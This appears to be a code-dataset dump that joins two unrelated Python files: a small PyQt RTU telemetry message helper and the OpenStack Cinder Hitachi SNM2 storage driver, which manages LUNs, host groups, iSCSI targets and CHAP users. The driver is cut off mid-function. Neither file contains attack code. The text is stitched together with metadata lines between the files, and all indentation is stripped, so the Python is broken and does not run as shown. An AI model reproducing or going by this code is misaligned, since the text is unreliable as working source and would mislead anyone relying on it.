xiefeimcu/mcu_code | Python/pyqt/rtuUI/rtuMsg.py | 1 | 3918 | __author__ = 'xiefei'
import sys
import time
import datetime
import binascii
stu = {
'IDT_TT': 'TT' ,
'IDT_ST' : 'ST' ,
'IDT_RGZS' : 'RGZS' ,
'IDT_PIC' : 'PIC' ,
'IDT_DRP' : 'DRP' ,
'IDT_DRZ1' : 'DRZ1' ,
'IDT_DRZ2' : 'DRZ2' ,
'IDT_DRZ3' : 'DRZ3' ,
'IDT_DRZ4' : 'DRZ4' ,
'IDT_DRZ5' : 'DRZ5' ,
'IDT_DRZ6' : 'DRZ6' ,
'IDT_DRZ7' : 'DRZ7' ,
'IDT_DRZ8' : 'DRZ8' ,
'IDT_DATA' : 'DATA' ,
'IDT_AC' : 'AC' ,
'IDT_AI' : 'AI' ,
'IDT_C' : 'C' ,
'IDT_DRxnn' : 'DRxnn' ,
'IDT_DT' : 'DT' ,
'IDT_ED' : 'ED' ,
'IDT_EJ' : 'EJ' ,
'IDT_FL' : 'FL' ,
'IDT_GH' : 'GH' ,
'IDT_GN' : 'GN' ,
'IDT_GS' : 'GS' ,
'IDT_GT' : 'GT' ,
'IDT_GTP' : 'GTP' ,
'IDT_H' : 'H' ,
'IDT_HW' : 'HW' ,
'IDT_M10' : 'M10' ,
'IDT_M20' : 'M20' ,
'IDT_M30' : 'M30' ,
'IDT_M40' : 'M40' ,
'IDT_M50' : 'M50' ,
'IDT_M60' : 'M60' ,
'IDT_M80' : 'M80' ,
'IDT_M100' : 'M100' ,
'IDT_MST' : 'MST' ,
'IDT_NS' : 'NS' ,
'IDT_P1' : 'P1' ,
'IDT_P2' : 'P2' ,
'IDT_P3' : 'P3' ,
'IDT_P6' : 'P6' ,
'IDT_P12' : 'P12' ,
'IDT_PD' : 'PD' ,
'IDT_PJ' : 'PJ' ,
'IDT_PN01' : 'PN01' ,
'IDT_PN05' : 'PN05' ,
'IDT_PN10' : 'PN10' ,
'IDT_PN30' : 'PN30' ,
'IDT_PR' : 'PR' ,
'IDT_PT' : 'PT' ,
'IDT_Q' : 'Q' ,
'IDT_Q1' : 'Q1' ,
'IDT_Q2' : 'Q2' ,
'IDT_Q3' : 'Q3' ,
'IDT_Q4' : 'Q4' ,
'IDT_Q5' : 'Q5' ,
'IDT_Q6' : 'Q6' ,
'IDT_Q7' : 'Q7' ,
'IDT_Q8' : 'Q8' ,
'IDT_QA' : 'QA' ,
'IDT_QZ' : 'QZ' ,
'IDT_SW' : 'SW' ,
'IDT_UC' : 'UC' ,
'IDT_UE' : 'UE' ,
'IDT_US' : 'US' ,
'IDT_VA' : 'VA' ,
'IDT_VJ' : 'VJ' ,
'IDT_VT' : 'VT' ,
'IDT_Z' : 'Z' ,
'IDT_ZB' : 'ZB' ,
'IDT_ZU' : 'ZU' ,
'IDT_Z1' : 'Z1' ,
'IDT_Z2' : 'Z2' ,
'IDT_Z3' : 'Z3' ,
'IDT_Z4' : 'Z4' ,
'IDT_Z5' : 'Z5' ,
'IDT_Z6' : 'Z6' ,
'IDT_Z7' : 'Z7' ,
'IDT_Z8' : 'Z8' ,
'IDT_SQ' : 'SQ' ,
'IDT_ZT' : 'ZT' ,
'IDT_pH' : 'pH' ,
'IDT_DO' : 'DO' ,
'IDT_COND' : 'COND' ,
'IDT_TURB' : 'TURB' ,
'IDT_CODMN' : 'CODMN' ,
'IDT_REDOX' : 'REDOX' ,
'IDT_NH4N' : 'NH4N' ,
'IDT_TP' : 'TP' ,
'IDT_TN' : 'TN' ,
'IDT_TOC' : 'TOC' ,
'IDT_CU' : 'CU' ,
'IDT_ZN' : 'ZN' ,
'IDT_SE' : 'SE' ,
'IDT_AS' : 'AS' ,
'IDT_THG' : 'THG' ,
'IDT_CD' : 'CD' ,
'IDT_PB' : 'PB' ,
'IDT_CHLA' : 'CHLA' ,
'IDT_WP1' : 'WP1' ,
'IDT_WP2' : 'WP2' ,
'IDT_WP3' : 'WP3' ,
'IDT_WP4' : 'WP4' ,
'IDT_WP5' : 'WP5' ,
'IDT_WP6' : 'WP6' ,
'IDT_WP7' : 'WP7' ,
'IDT_WP8' : 'WP8' ,
'IDT_SYL1' : 'SYL1' ,
'IDT_SYL2' : 'SYL2' ,
'IDT_SYL3' : 'SYL3' ,
'IDT_SYL4' : 'SYL4' ,
'IDT_SYL5' : 'SYL5' ,
'IDT_SYL6' : 'SYL6' ,
'IDT_SYL7' : 'SYL7' ,
'IDT_SYL8' : 'SYL8' ,
'IDT_SBL1' : 'SBL1' ,
'IDT_SBL2' : 'SBL2' ,
'IDT_SBL3' : 'SBL3' ,
'IDT_SBL4' : 'SBL4' ,
'IDT_SBL5' : 'SBL5' ,
'IDT_SBL6' : 'SBL6' ,
'IDT_SBL7' : 'SBL7' ,
'IDT_SBL8' : 'SBL8' ,
'IDT_VTA' : 'VTA' ,
'IDT_VTB' : 'VTB' ,
'IDT_VTC' : 'VTC' ,
'IDT_VIA' : 'VIA' ,
'IDT_VIB' : 'VIB' ,
'IDT_VIC' : 'VIC' ,
}
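# The 'stu' table maps internal identifier constants to the element codes
# carried in RTU telemetry messages (the DRP/DRZn/PNnn codes resemble the
# Chinese hydrological telemetry standard SL 651, though that is an
# assumption). A hedged lookup sketch:
#
#     code = stu.get('IDT_DRP')   # -> 'DRP'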
class messag():
def getSystimeS(self):
return time.strftime("%y%m%d%H%M%S")
def getSystime(self):
return time.strftime("%y%m%d%H%M")
def sendRtuArgTable(self, data, Len):
print(str(data))
print(stu.get('IDT_VIC'))
def initRtu(self):
# bound method call; passing self explicitly would raise a TypeError
self.sendRtuArgTable('nihao', 5)
| gpl-3.0 |
tobegit3hub/cinder_docker | cinder/volume/drivers/hitachi/hbsd_snm2.py | 29 | 43676 | # Copyright (C) 2014, Hitachi, Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
import shlex
import threading
import time
from oslo_log import log as logging
from oslo_service import loopingcall
from oslo_utils import excutils
from oslo_utils import units
import six
from cinder import exception
from cinder.i18n import _LE, _LW
from cinder import utils
from cinder.volume.drivers.hitachi import hbsd_basiclib as basic_lib
LOG = logging.getLogger(__name__)
SNM2_ENV = ('LANG=C STONAVM_HOME=/usr/stonavm '
'LD_LIBRARY_PATH=/usr/stonavm/lib '
'STONAVM_RSP_PASS=on STONAVM_ACT=on')
MAX_HOSTGROUPS = 127
MAX_HOSTGROUPS_ISCSI = 254
MAX_HLUN = 2047
EXEC_LOCK_PATH_BASE = basic_lib.LOCK_DIR + 'hsnm_'
EXEC_TIMEOUT = 10
EXEC_INTERVAL = 1
CHAP_TIMEOUT = 5
PAIRED = 12
DUMMY_LU = -1
class HBSDSNM2(basic_lib.HBSDBasicLib):
def __init__(self, conf):
super(HBSDSNM2, self).__init__(conf=conf)
self.unit_name = conf.hitachi_unit_name
self.hsnm_lock = threading.Lock()
self.hsnm_lock_file = ('%s%s'
% (EXEC_LOCK_PATH_BASE, self.unit_name))
copy_speed = conf.hitachi_copy_speed
if copy_speed <= 2:
self.pace = 'slow'
elif copy_speed == 3:
self.pace = 'normal'
else:
self.pace = 'prior'
def _wait_for_exec_hsnm(self, args, printflag, noretry, timeout, start):
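# Invoked repeatedly by the FixedIntervalLoopingCall set up in exec_hsnm();
# raising LoopingCallDone stops the polling and returns its argument as the
# loop result, while falling through means "retry on the next interval".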
lock = basic_lib.get_process_lock(self.hsnm_lock_file)
with self.hsnm_lock, lock:
ret, stdout, stderr = self.exec_command('env', args=args,
printflag=printflag)
if not ret or noretry:
raise loopingcall.LoopingCallDone((ret, stdout, stderr))
if time.time() - start >= timeout:
LOG.error(_LE("snm2 command timeout."))
raise loopingcall.LoopingCallDone((ret, stdout, stderr))
if (re.search('DMEC002047', stderr)
or re.search('DMEC002048', stderr)
or re.search('DMED09000A', stderr)
or re.search('DMED090026', stderr)
or re.search('DMED0E002B', stderr)
or re.search('DMER03006A', stderr)
or re.search('DMER030080', stderr)
or re.search('DMER0300B8', stderr)
or re.search('DMER0800CF', stderr)
or re.search('DMER0800D[0-6D]', stderr)
or re.search('DMES052602', stderr)):
LOG.error(_LE("Unexpected error occurs in snm2."))
raise loopingcall.LoopingCallDone((ret, stdout, stderr))
def exec_hsnm(self, command, args, printflag=True, noretry=False,
timeout=EXEC_TIMEOUT, interval=EXEC_INTERVAL):
args = '%s %s %s' % (SNM2_ENV, command, args)
loop = loopingcall.FixedIntervalLoopingCall(
self._wait_for_exec_hsnm, args, printflag,
noretry, timeout, time.time())
return loop.start(interval=interval).wait()
def _execute_with_exception(self, cmd, args, **kwargs):
ret, stdout, stderr = self.exec_hsnm(cmd, args, **kwargs)
if ret:
cmds = '%(cmd)s %(args)s' % {'cmd': cmd, 'args': args}
msg = basic_lib.output_err(
600, cmd=cmds, ret=ret, out=stdout, err=stderr)
raise exception.HBSDError(data=msg)
return ret, stdout, stderr
def _execute_and_return_stdout(self, cmd, args, **kwargs):
result = self._execute_with_exception(cmd, args, **kwargs)
return result[1]
def get_comm_version(self):
ret, stdout, stderr = self.exec_hsnm('auman', '-help')
m = re.search('Version (\d+).(\d+)', stdout)
if not m:
msg = basic_lib.output_err(
600, cmd='auman', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
return '%s.%s' % (m.group(1), m.group(2))
def add_used_hlun(self, command, port, gid, used_list, ldev):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm(command,
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
for line in lines[2:]:
line = shlex.split(line)
if not line:
continue
if line[0] == port and int(line[1][0:3]) == gid:
if int(line[2]) not in used_list:
used_list.append(int(line[2]))
if int(line[3]) == ldev:
hlu = int(line[2])
LOG.warning(_LW('ldev(%(ldev)d) is already mapped '
'(hlun: %(hlu)d)'),
{'ldev': ldev, 'hlu': hlu})
return hlu
return None
def _get_lu(self, lu=None):
# When 'lu' is 0 a plain truth test would be False, so the
# 'is None' check cannot be removed.
if lu is None:
args = '-unit %s' % self.unit_name
else:
args = '-unit %s -lu %s' % (self.unit_name, lu)
return self._execute_and_return_stdout('auluref', args)
def get_unused_ldev(self, ldev_range):
start = ldev_range[0]
end = ldev_range[1]
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('auluref', '-unit %s' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='auluref', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
free_ldev = start
lines = stdout.splitlines()
found = False
for line in lines[2:]:
line = shlex.split(line)
if not line:
continue
ldev_num = int(line[0])
if free_ldev > ldev_num:
continue
if free_ldev == ldev_num:
free_ldev += 1
else:
found = True
break
if free_ldev > end:
break
else:
found = True
if not found:
msg = basic_lib.output_err(648, resource='LDEV')
raise exception.HBSDError(message=msg)
return free_ldev
def get_hgname_gid(self, port, host_grp_name):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('auhgdef',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='auhgdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
is_target_port = False
for line in lines:
line = shlex.split(line)
if not line:
continue
if line[0] == 'Port' and line[1] == port:
is_target_port = True
continue
if is_target_port:
if line[0] == 'Port':
break
if not line[0].isdigit():
continue
gid = int(line[0])
if line[1] == host_grp_name:
return gid
return None
def get_unused_gid(self, group_range, port):
start = group_range[0]
end = group_range[1]
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('auhgdef',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='auhgdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
is_target_port = False
free_gid = start
found = False
for line in lines:
line = shlex.split(line)
if not line:
continue
if line[0] == 'Port' and line[1] == port:
is_target_port = True
continue
if is_target_port:
if line[0] == 'Port':
found = True
break
if not line[0].isdigit():
continue
gid = int(line[0])
if free_gid > gid:
continue
if free_gid == gid:
free_gid += 1
else:
found = True
break
if free_gid > end or free_gid > MAX_HOSTGROUPS:
break
else:
found = True
if not found:
msg = basic_lib.output_err(648, resource='GID')
raise exception.HBSDError(message=msg)
return free_gid
def comm_set_target_wwns(self, target_ports):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('aufibre1',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='aufibre1', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
target_wwns = {}
for line in lines[3:]:
if re.match('Transfer', line):
break
line = shlex.split(line)
if len(line) < 4:
continue
port = '%s%s' % (line[0], line[1])
if target_ports:
if port in target_ports:
target_wwns[port] = line[3]
else:
target_wwns[port] = line[3]
LOG.debug('target wwns: %s', target_wwns)
return target_wwns
def get_hostgroup_from_wwns(self, hostgroups, port, wwns, buf, login):
for pt in wwns:
for line in buf[port]['assigned']:
hgname = shlex.split(line[38:])[1][4:]
if not re.match(basic_lib.NAME_PREFIX, hgname):
continue
if pt.search(line[38:54]):
wwn = line[38:54]
gid = int(shlex.split(line[38:])[1][0:3])
is_detected = None
if login:
for line in buf[port]['detected']:
if pt.search(line[38:54]):
is_detected = True
break
else:
is_detected = False
hostgroups.append({'port': six.text_type(port), 'gid': gid,
'initiator_wwn': wwn,
'detected': is_detected})
def comm_get_hostgroup_info(self, hgs, wwns, target_ports, login=True):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('auhgwwn',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='auhgwwn', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
security_ports = []
patterns = []
for wwn in wwns:
pt = re.compile(wwn, re.IGNORECASE)
patterns.append(pt)
lines = stdout.splitlines()
buf = {}
_buffer = []
port = None
security = None
for line in lines:
if re.match('Port', line):
port = shlex.split(line)[1]
if target_ports and port not in target_ports:
port = None
else:
security = True if shlex.split(line)[5] == 'ON' else False
buf[port] = {'detected': [], 'assigned': [],
'assignable': []}
if security:
security_ports.append(port)
continue
if port and security:
if re.search('Detected WWN', line):
_buffer = buf[port]['detected']
continue
elif re.search('Assigned WWN', line):
_buffer = buf[port]['assigned']
continue
elif re.search('Assignable WWN', line):
_buffer = buf[port]['assignable']
continue
_buffer.append(line)
hostgroups = []
for port in buf.keys():
self.get_hostgroup_from_wwns(
hostgroups, port, patterns, buf, login)
for hostgroup in hostgroups:
hgs.append(hostgroup)
return security_ports
def comm_delete_lun_core(self, command, hostgroups, lun):
unit = self.unit_name
no_lun_cnt = 0
deleted_hostgroups = []
for hostgroup in hostgroups:
LOG.debug('comm_delete_lun: hostgroup is %s', hostgroup)
port = hostgroup['port']
gid = hostgroup['gid']
ctl_no = port[0]
port_no = port[1]
is_deleted = False
for deleted in deleted_hostgroups:
if port == deleted['port'] and gid == deleted['gid']:
is_deleted = True
if is_deleted:
continue
ret, stdout, stderr = self.exec_hsnm(command,
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
for line in lines[2:]:
line = shlex.split(line)
if not line:
continue
if (line[0] == port and int(line[1][0:3]) == gid
and int(line[3]) == lun):
hlu = int(line[2])
break
else:
no_lun_cnt += 1
if no_lun_cnt == len(hostgroups):
raise exception.HBSDNotFound
else:
continue
opt = '-unit %s -rm %s %s %d %d %d' % (unit, ctl_no, port_no,
gid, hlu, lun)
ret, stdout, stderr = self.exec_hsnm(command, opt)
if ret:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
deleted_hostgroups.append({'port': port, 'gid': gid})
LOG.debug('comm_delete_lun is over (%d)', lun)
def comm_delete_lun(self, hostgroups, ldev):
self.comm_delete_lun_core('auhgmap', hostgroups, ldev)
def comm_delete_lun_iscsi(self, hostgroups, ldev):
self.comm_delete_lun_core('autargetmap', hostgroups, ldev)
def comm_add_ldev(self, pool_id, ldev, capacity, is_vvol):
unit = self.unit_name
if is_vvol:
command = 'aureplicationvvol'
opt = ('-unit %s -add -lu %d -size %dg'
% (unit, ldev, capacity))
else:
command = 'auluadd'
opt = ('-unit %s -lu %d -dppoolno %d -size %dg'
% (unit, ldev, pool_id, capacity))
ret, stdout, stderr = self.exec_hsnm(command, opt)
if ret:
if (re.search('DMEC002047', stderr)
or re.search('DMES052602', stderr)
or re.search('DMED09000A', stderr)):
raise exception.HBSDNotFound
else:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_add_hostgrp(self, port, gid, host_grp_name):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -add %s %s -gno %d -gname %s' % (unit, ctl_no,
port_no, gid,
host_grp_name)
ret, stdout, stderr = self.exec_hsnm('auhgdef', opt)
if ret:
raise exception.HBSDNotFound
def comm_del_hostgrp(self, port, gid, host_grp_name):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -rm %s %s -gname %s' % (unit, ctl_no, port_no,
host_grp_name)
ret, stdout, stderr = self.exec_hsnm('auhgdef', opt)
if ret:
msg = basic_lib.output_err(
600, cmd='auhgdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_add_hbawwn(self, port, gid, wwn):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -set -permhg %s %s %s -gno %d' % (unit, ctl_no,
port_no, wwn, gid)
ret, stdout, stderr = self.exec_hsnm('auhgwwn', opt)
if ret:
opt = '-unit %s -assign -permhg %s %s %s -gno %d' % (unit, ctl_no,
port_no, wwn,
gid)
ret, stdout, stderr = self.exec_hsnm('auhgwwn', opt)
if ret:
msg = basic_lib.output_err(
600, cmd='auhgwwn', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_add_lun(self, command, hostgroups, ldev, is_once=False):
unit = self.unit_name
tmp_hostgroups = hostgroups[:]
used_list = []
is_ok = False
hlu = None
old_hlu = None
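# First pass: collect the HLUNs already used on each host group and, if
# this LDEV is already mapped somewhere, reuse that HLUN. The same LDEV
# must keep one HLUN across host groups, so conflicting values are an
# error.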
for hostgroup in hostgroups:
port = hostgroup['port']
gid = hostgroup['gid']
hlu = self.add_used_hlun(command, port, gid, used_list, ldev)
# When 'hlu' or 'old_hlu' is 0 a plain truth test would be False,
# so the 'is not None' checks cannot be removed.
if hlu is not None:
if old_hlu is not None and old_hlu != hlu:
msg = basic_lib.output_err(648, resource='LUN (HLUN)')
raise exception.HBSDError(message=msg)
is_ok = True
hostgroup['lun'] = hlu
tmp_hostgroups.remove(hostgroup)
old_hlu = hlu
else:
hlu = old_hlu
if not used_list:
hlu = 0
elif hlu is None:
for i in range(MAX_HLUN + 1):
if i not in used_list:
hlu = i
break
else:
raise exception.HBSDNotFound
ret = 0
stdout = None
stderr = None
invalid_hgs_str = None
for hostgroup in tmp_hostgroups:
port = hostgroup['port']
gid = hostgroup['gid']
ctl_no = port[0]
port_no = port[1]
if not hostgroup['detected']:
if invalid_hgs_str:
invalid_hgs_str = '%s, %s:%d' % (invalid_hgs_str,
port, gid)
else:
invalid_hgs_str = '%s:%d' % (port, gid)
continue
opt = '-unit %s -add %s %s %d %d %d' % (unit, ctl_no, port_no,
gid, hlu, ldev)
ret, stdout, stderr = self.exec_hsnm(command, opt)
if ret == 0:
is_ok = True
hostgroup['lun'] = hlu
if is_once:
break
else:
LOG.warning(basic_lib.set_msg(
314, ldev=ldev, lun=hlu, port=port, id=gid))
if not is_ok:
if stderr:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
else:
msg = basic_lib.output_err(659, gid=invalid_hgs_str)
raise exception.HBSDError(message=msg)
def comm_delete_ldev(self, ldev, is_vvol):
unit = self.unit_name
if is_vvol:
command = 'aureplicationvvol'
opt = '-unit %s -rm -lu %d' % (unit, ldev)
else:
command = 'auludel'
opt = '-unit %s -lu %d -f' % (unit, ldev)
ret, stdout, stderr = self.exec_hsnm(command, opt,
timeout=30, interval=3)
if ret:
if (re.search('DMEC002048', stderr)
or re.search('DMED090026', stderr)):
raise exception.HBSDNotFound
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
return ret
def comm_extend_ldev(self, ldev, old_size, new_size):
unit = self.unit_name
command = 'auluchgsize'
options = '-unit %s -lu %d -size %dg' % (unit, ldev, new_size)
ret, stdout, stderr = self.exec_hsnm(command, options)
if ret:
msg = basic_lib.output_err(
600, cmd=command, ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def delete_chap_user(self, port):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
auth_username = self.conf.hitachi_auth_user
opt = '-unit %s -rm %s %s -user %s' % (unit, ctl_no, port_no,
auth_username)
return self.exec_hsnm('auchapuser', opt)
def _wait_for_add_chap_user(self, cmd, auth_username,
auth_password, start):
# Don't move 'import pexpect' to the beginning of the file, so that
# Tempest can still run in environments where pexpect is unavailable.
import pexpect
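# The CHAP secret cannot be supplied on the command line, so the
# interactive "Secret:" prompts from auchapuser are answered by driving
# the child process with pexpect; success is recognized from the
# confirmation message.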
lock = basic_lib.get_process_lock(self.hsnm_lock_file)
with self.hsnm_lock, lock:
try:
child = pexpect.spawn(cmd)
child.expect('Secret: ', timeout=CHAP_TIMEOUT)
child.sendline(auth_password)
child.expect('Re-enter Secret: ',
timeout=CHAP_TIMEOUT)
child.sendline(auth_password)
child.expect('The CHAP user information has '
'been added successfully.',
timeout=CHAP_TIMEOUT)
except Exception:
if time.time() - start >= EXEC_TIMEOUT:
msg = basic_lib.output_err(642, user=auth_username)
raise exception.HBSDError(message=msg)
else:
raise loopingcall.LoopingCallDone(True)
def set_chap_authention(self, port, gid):
ctl_no = port[0]
port_no = port[1]
unit = self.unit_name
auth_username = self.conf.hitachi_auth_user
auth_password = self.conf.hitachi_auth_password
add_chap_user = self.conf.hitachi_add_chap_user
assign_flag = True
added_flag = False
opt = '-unit %s -refer %s %s -user %s' % (unit, ctl_no, port_no,
auth_username)
ret, stdout, stderr = self.exec_hsnm('auchapuser', opt, noretry=True)
if ret:
if not add_chap_user:
msg = basic_lib.output_err(643, user=auth_username)
raise exception.HBSDError(message=msg)
root_helper = utils.get_root_helper()
cmd = ('%s env %s auchapuser -unit %s -add %s %s '
'-tno %d -user %s' % (root_helper, SNM2_ENV, unit, ctl_no,
port_no, gid, auth_username))
LOG.debug('Add CHAP user')
loop = loopingcall.FixedIntervalLoopingCall(
self._wait_for_add_chap_user, cmd,
auth_username, auth_password, time.time())
added_flag = loop.start(interval=EXEC_INTERVAL).wait()
else:
lines = stdout.splitlines()[4:]
for line in lines:
if int(shlex.split(line)[0][0:3]) == gid:
assign_flag = False
break
if assign_flag:
opt = '-unit %s -assign %s %s -tno %d -user %s' % (unit, ctl_no,
port_no, gid,
auth_username)
ret, stdout, stderr = self.exec_hsnm('auchapuser', opt)
if ret:
if added_flag:
_ret, _stdout, _stderr = self.delete_chap_user(port)
if _ret:
LOG.warning(basic_lib.set_msg(
303, user=auth_username))
msg = basic_lib.output_err(
600, cmd='auchapuser', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
return added_flag
def comm_add_hostgrp_iscsi(self, port, gid, target_alias, target_iqn):
auth_method = self.conf.hitachi_auth_method
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
if auth_method:
auth_arg = '-authmethod %s -mutual disable' % auth_method
else:
auth_arg = '-authmethod None'
opt = '-unit %s -add %s %s -tno %d' % (unit, ctl_no, port_no, gid)
opt = '%s -talias %s -iname %s %s' % (opt, target_alias, target_iqn,
auth_arg)
ret, stdout, stderr = self.exec_hsnm('autargetdef', opt)
if ret:
raise exception.HBSDNotFound
def delete_iscsi_target(self, port, _target_no, target_alias):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -rm %s %s -talias %s' % (unit, ctl_no, port_no,
target_alias)
return self.exec_hsnm('autargetdef', opt)
def comm_set_hostgrp_reportportal(self, port, target_alias):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -set %s %s -talias %s' % (unit, ctl_no, port_no,
target_alias)
opt = '%s -ReportFullPortalList enable' % opt
ret, stdout, stderr = self.exec_hsnm('autargetopt', opt)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetopt', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_add_initiator(self, port, gid, host_iqn):
unit = self.unit_name
ctl_no = port[0]
port_no = port[1]
opt = '-unit %s -add %s %s -tno %d -iname %s' % (unit, ctl_no,
port_no, gid,
host_iqn)
ret, stdout, stderr = self.exec_hsnm('autargetini', opt)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetini', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
def comm_get_hostgroup_info_iscsi(self, hgs, host_iqn, target_ports):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('autargetini',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetini', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
security_ports = []
lines = stdout.splitlines()
hostgroups = []
security = True
for line in lines:
if not shlex.split(line):
continue
if re.match('Port', line):
line = shlex.split(line)
port = line[1]
security = True if line[4] == 'ON' else False
continue
if target_ports and port not in target_ports:
continue
if security:
if (host_iqn in shlex.split(line[72:]) and
re.match(basic_lib.NAME_PREFIX,
shlex.split(line)[0][4:])):
gid = int(shlex.split(line)[0][0:3])
hostgroups.append(
{'port': port, 'gid': gid, 'detected': True})
LOG.debug('Find port=%(port)s gid=%(gid)d',
{'port': port, 'gid': gid})
if port not in security_ports:
security_ports.append(port)
for hostgroup in hostgroups:
hgs.append(hostgroup)
return security_ports
def comm_get_iscsi_ip(self, port):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('auiscsi',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='auiscsi', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
lines = stdout.splitlines()
is_target_port = False
for line in lines:
line_array = shlex.split(line)
if not line_array:
continue
if line_array[0] == 'Port' and line_array[1] != 'Number':
if line_array[1] == port:
is_target_port = True
else:
is_target_port = False
continue
if is_target_port and re.search('IPv4 Address', line):
ip_addr = shlex.split(line)[3]
break
if is_target_port and re.search('Port Number', line):
ip_port = shlex.split(line)[3]
else:
msg = basic_lib.output_err(651)
raise exception.HBSDError(message=msg)
return ip_addr, ip_port
def comm_get_target_iqn(self, port, gid):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('autargetdef',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
is_target_host = False
tmp_port = None
lines = stdout.splitlines()
for line in lines:
line = shlex.split(line)
if not line:
continue
if line[0] == "Port":
tmp_port = line[1]
continue
if port != tmp_port:
continue
gid_tmp = line[0][0:3]
if gid_tmp.isdigit() and int(gid_tmp) == gid:
is_target_host = True
continue
if is_target_host and line[0] == "iSCSI":
target_iqn = line[3]
break
else:
msg = basic_lib.output_err(650, resource='IQN')
raise exception.HBSDError(message=msg)
return target_iqn
def get_unused_gid_iscsi(self, group_range, port):
start = group_range[0]
end = min(group_range[1], MAX_HOSTGROUPS_ISCSI)
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('autargetdef',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
used_list = []
tmp_port = None
lines = stdout.splitlines()
for line in lines:
line = shlex.split(line)
if not line:
continue
if line[0] == "Port":
tmp_port = line[1]
continue
if port != tmp_port:
continue
if line[0][0:3].isdigit():
gid = int(line[0][0:3])
if start <= gid <= end:
used_list.append(gid)
if not used_list:
return start
for gid in range(start, end + 1):
if gid not in used_list:
break
else:
msg = basic_lib.output_err(648, resource='GID')
raise exception.HBSDError(message=msg)
return gid
def get_gid_from_targetiqn(self, target_iqn, target_alias, port):
unit = self.unit_name
ret, stdout, stderr = self.exec_hsnm('autargetdef',
'-unit %s -refer' % unit)
if ret:
msg = basic_lib.output_err(
600, cmd='autargetdef', ret=ret, out=stdout, err=stderr)
raise exception.HBSDCmdError(message=msg, ret=ret, err=stderr)
gid = None
tmp_port = None
found_alias_full = False
found_alias_part = False
lines = stdout.splitlines()
